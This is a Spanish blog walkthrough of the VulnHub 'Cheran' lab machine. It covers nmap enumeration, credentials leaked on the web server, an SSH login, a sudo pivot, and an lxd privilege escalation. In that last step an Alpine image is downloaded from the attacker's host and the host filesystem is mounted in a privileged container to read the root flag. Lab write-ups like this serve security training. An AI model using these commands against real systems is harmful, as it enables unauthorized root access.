[VULNHUB] Cheran

Hoy vamos a hackear la maquina de Vulnhub llamada Cheran. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/cheran-1,521/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.35 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 11:28 CEST Nmap scan report for 192.168.1.35 Host is up (0.049s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 38:20:1e:42:7a:d6:a9:2a:01:62:58:f3:b6:37:d8:41 (RSA) | 256 e8:c1:5a:14:7a:c6:09:24:b6:0a:c0:05:e4:82:03:d9 (ECDSA) |_ 256 91:b9:e9:b9:e7:83:7a:28:71:48:c4:58:9b:39:7b:a1 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: A complete list of Chera Rulers and their contribution 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: ubuntu | NetBIOS computer name: UBUNTU\x00 | Domain name: \x00 | FQDN: ubuntu |_ System time: 2020-09-08T14:59:23+05:30 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-09-08 11:29:23 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds

http://192.168.1.35/robots.txt

/* /users /youtube

Si visitamos http://192.168.1.35/users.txt vemos que nos aparece "Rajasimha", el cual como el nombre del fichero indica puede ser el user. Por otro lado, si visitamos http://192.168.1.35/youtube/youtube.html aparecen una lista de enlaces a videos de Youtube. Si hacemos clic en el 4 enlace empezando por abajo podemos ver al final de la descripcion del video: Password : k4rur Teniendo ya el user/password tratamos de loguearnos por SSH.

Low Shell

~ > ssh Rajasimha@192.168.1.35 Rajasimha@192.168.1.35's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Sep 8 15:06:41 IST 2020 System load: 0.04 Processes: 97 Usage of /: 25.4% of 9.78GB Users logged in: 0 Memory usage: 33% IP address for enp0s3: 192.168.1.35 Swap usage: 0% Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9 Rajasimha@ubuntu:~$

Miramos si podemos hacer algo con sudo.

Rajasimha@ubuntu:/tmp$ sudo -l [sudo] password for Rajasimha: Matching Defaults entries for Rajasimha on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User Rajasimha may run the following commands on ubuntu: (ALL, !root) /bin/bash

Vemos que podemos usar sudo para obtener una shell con los privilegios de "cheran".

Rajasimha@ubuntu:/tmp$ sudo -u cheran /bin/bash cheran@ubuntu:/tmp$ id uid=1000(cheran) gid=1000(cheran) groups=1000(cheran),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),115(s ambashare),116(lpadmin)

Privilege Escalation

Como "cheran" vemos que estamos dentro del grupo lxd, asi que vamos a usar lxd para leer la flag de root, montando el FS en un container, y accediendo desde dentro del container a la carpeta de root del host. Empezamos inicializando lxd.

cheran@ubuntu:~$ lxd init Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: Create a new BTRFS pool? (yes/no) [default=yes]: Would you like to use an existing block device? (yes/no) [default=no]: Size in GB of the new loop device (1GB minimum) [default=15GB]: Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, â€œautoâ€ or â€œnoneâ€) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, â€œautoâ€ or â€œnoneâ€) [default=auto]: Would you like LXD to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes] Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: cheran@ubuntu:~$

En los siguientes pasos, es necesario que el usuario "cheran" tenga acceso a un fichero del directorio del home de Rajasimha para poder importar el container y usar lxc, para ello como usuario Rajasimha, ejecutamos el siguiente comando para hacer accesible todo lo que haya en su home a todo el mundo.

Rajasimha@ubuntu:/home$ chmod -R 777 Rajasimha/

Vamos a seguir los pasos indicados en[1] para hacer usar lxd. En nuestra maquina nos descargamos el siguiente script que nos preparara una imagen.

~ > git clone https://github.com/saghul/lxd-alpine-builder.git ~ > cd lxd-alpine-builder ~ > ./build-alpine

Una vez tenemos la imagen, la movemos a nuestro servidor web para hacerla accesible.

~ > mv alpine-v3.12-x86_64-20200917_1130.tar.gz alp.tar.gz ~ > sudo mv alp.tar.gz /var/www/html

La descargamos en la maquina victima:

cheran@ubuntu:~$ cd /tmp cheran@ubuntu:/tmp$ wget http://192.168.1.59/alp.tar.gz

Ejecutamos los siguientes comandos para montar la imagen.

cheran@ubuntu:/tmp$ lxc image import alpine.tar.gz --alias alpine cheran@ubuntu:/tmp$ lxc init alpine privesc -c security.privileged=true Creating privesc cheran@ubuntu:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true Device host-root added to privesc cheran@ubuntu:/tmp$ lxc start privesc

Por ultimo, accedemos al container donde somos root y podemos navegar por el FS del host montado en /mnt/root.

cheran@ubuntu:/tmp$ lxc exec privesc /bin/sh ~ # id uid=0(root) gid=0(root)

root.txt

~ # cd /mnt/root/root /mnt/root/root # ls root.txt /mnt/root/root # cat root.txt Bow & Arrow (/,** %%/ /***********/(.Cheran Flag.)/*******////*/* /(,, /*****/((((//******/ // /(, .,, /( /(, */, / (#, , ,,, ./ (# , ,,, // (# .. ,,, /( ## .(,,,,,,,,,,,,,,, /, ## * ,, *. ## , ,, * ## * .,,, /* ## **, /* #% ,, ***** #% **, .*****************, #%*. %% Congrats... ## ## #( Here is the Flag... #* .#* .(* Share your screenshot in telegram : https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg *

End

Y con esto ya seriamos root de la maquina. [1]https://www.hackingarticles.in/lxd-privilege-escalation/